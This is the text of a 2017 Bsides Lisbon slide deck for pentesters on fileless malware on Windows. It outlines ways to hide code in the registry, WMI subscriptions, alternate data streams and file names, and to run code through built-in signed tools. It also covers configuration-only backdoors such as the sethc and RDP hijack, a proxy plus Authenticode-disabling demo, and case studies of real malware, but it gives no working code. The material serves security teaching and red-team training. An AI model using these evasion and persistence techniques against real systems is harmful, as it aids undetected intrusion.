FileLess MalwareInfections

Malware tricks for PentestersRamon Pinuaga

Bsides Lisbon 2017

2

1) Presentation

2) Real world examples

3) Process• Infection

• Persistence

4) Conclusions

Index

PRESENTATION

4

• Pentester for many, many years.

• Current position: Cybersecurity Audit Manager at PROSEGUR Spain.

• I prefer the offensive side of security.

Who are you?

5

• Malicious code that doesn't need to create or drop regular files on the system.

• Move away from the traditional monolithic malware or pentesting framework.

• For persistence we usually need to leave at least something on the system but we can hide it and make it very small.

What is FileLess Malware?

7

• We have 2 main ways to achieve an infection without files:• Not using malware (or code) at all. E.G. planting a

configuration only backdoor on a system. That way we don’t control the system all the time but we can access it later.

• Using code that never touches disk. In his clear form. For persistence we always need a way to keep at least the first stage of the code on the system.

FileLess or MalwareLess?

8

• Evading Antivirus detection: No file, No scan, No VirusTotal upload.

• Leaving a smaller forensic trail: Less artifacts.

• Difficult environments (hard to upload things).

• Helps in bypassing Application Whitelisting (SRP, Applocker, etc.)

Why FileLess in pentesting?

10

• Long-term persistence.

• Kernel-level access.

• High level hiding.

• Quickness and simplicity: Only userland, No rootkits, No NSA like implants.

Pentest vs APT

DEMO: RDP + Sethc

• Enable remote desktop• Hijack sethc.exe• Change RDP port• Open windows firewall

13

• Keeping all in memory. (Problem: no persistence)

• Storing the code in non-file or non-regular storage (classics):• Outside the filesystem: UEFI, HDD Firmware, Hidden disk

areas, $EA, etc. (We are not going that far, remember; only userland)

• Network / External systems.

• Alternate Data Streams (ADS).

• Registry.

How to keep code without files?

14

• WMI (subscriptions).

• Windows events (.evt).

• Inside Documents (.doc, .xls, .pdf).

• File/Directory names (0-day).

• Environment variables (more 0-day).

Novel non-regular storage

DEMO: Code in filenames

• Stage 1: Run key• Stage 2: Environment• Stage 3: Dir names

17

• Remote injection in memory -> Remote call or exploit.

• Load of remote binaries (EXEs, DLLs) -> Via SMB, WebDAV, etc.

• Scripting languages -> Loaded remotely or from the command line.• PowerShell (Powershell.exe)

• Javascript/Vbscript (Cscript.exe, Wscript.exe, Mshta.exe, Rundll32.exe, Regsvr32.exe).

• .Net assemblies (InstallUtil.exe, IEExec.exe, RegAsm.exe).

How to execute code without files?

18

• Tools already installed on the system (no new files).

• Tools that allow receiving external input (via command line or via the network).

• Bonus: Tools signed by Microsoft.

Our FileLess pentest framework

REAL WORLD EXAMPLES

20

• Worms (memory only):• Slammer.

• Poweliks.

• WMIGhost.

• Empire.

• Duqu 2.0 (Kaspersky).

Real world examples

21

• Worm that infected thousands of computers and impacted general Internet traffic in some areas.

• The worm exploited a buffer overflow vulnerability in Microsoft SQL Server resolution service (1434/UDP).

• Only 376 bytes and fitted into a single UDP packet.

Slammer (2003)

22

• Infection via Word macro (No FileLess).

• Persistence via Autostart registry key (HKLM\Software\Microsoft\Windows\CurrentVersion\Run).

• Minimal first stage: Uses clever rundll32 trick to run Javascript code.

• Next stages also stored in the registry (encoded). Runs PowerShell code.

• PowerShell injects a DLL in another process memory, without touching disk.

Poweliks (2014)

23

Poweliks – Rundll32 trick

24

• Infection via Word macro.

• Dropper and UAC bypass binaries touch disk (not fully FileLess).

• Then it register the permanent and necessary WMI classes: event definition, event filter and event consumer.

• It uses Javascript for payload code in the event consumer active script.

WMIghost (2014)

25

• PowerShell based RAT.

• It tries to be as FileLess as possible.

• Mostly working from memory only.

• Various options for persistent storage: Registry, ADS, Eventlog and of course WMI subscriptions.

Empire (2015)

26

• Unknown infection vector.

• Only a few selected hosts were used for on-disk persistence.

• These hosts injected the malware remotely into other systems memory.

• For this task the malware gained domain administrator privileges and then it deployed MSI packages (via a new service or a scheduled task).

Duqu 2.0 (2015)

28

• First stage: Minimal. Usually a small vbs or js (not directly PowerShell).

• Second Stage: Main script based on PowerShell. More complex and powerful logic that injects a binary into another process.

• Third stage: Binary. Usually a PE DLL payload. More similar to traditional malware, but never touches disk.

Common FileLess behavior

PROCESS

30

• An ideal FileLess pentest operation should cover the following phases:

1. FileLess Infection.

2. Installation of FileLess Backdoors.

3. Gain FileLess Persistence.

Operation Process

31

• Infection without sending any files.

• Not common. Even known FileLess APT operations use some kind of files in this stage.

• Preferably, we need to deliver the exploit before the application layer.• Inside a stream.

• At the lower network layers (e.g. SMB or SSL exploits).

• Open network services (e.g. Eternalblue).

FileLess Infection

32

• Configuration only backdoors (no code).

• Some popular:• Create user + Remote exec (Psexec/Sc, WMI, SchTasks,

WinRM, PSRemoting).

• Binary Image Hijack + Remote Desktop.

• Silver/Golden tickets.

• Proxy + Decrease security.

FileLess Backdoors

34

• First stage: Registry Autostart entries.• Run entries.

• Scheduled tasks.

• Image hijacks.

• WMI.

• Services (not very elegant).

• Usually too noisy! For a human analyst but harder to detect with automated tools because we are not using any files.

FileLess persistence

CONCLUSIONS

36

• Full pentest operations are possible without using any files (or almost).

• We need some “resident” artifacts on the system, but these can be very small and can be easily hidden.

Conclusions

37

• Questions? Comments?

• https://twitter.com/rpinuaga

Thanks

38

• A lot of ideas taken from:• Casey Smith: https://twitter.com/subtee

• Didier Stevens: https://twitter.com/DidierStevens

• Alex Abramov: https://twitter.com/codereversing

• Rob Fuller: https://twitter.com/mubix

• Cneelis: https://twitter.com/Cneelis

• Matt Nelson: https://twitter.com/enigma0x3

• Matt Graeber: https://twitter.com/mattifestation

• James Foreshaw - https://twitter.com/tiraniddo

Previous research

www.prosegur.com

DEMO: Proxy + Authenticode

• Convince the user to execute a .REG file• Configure Proxy• Disable Authenticode validation• Wait for EXE download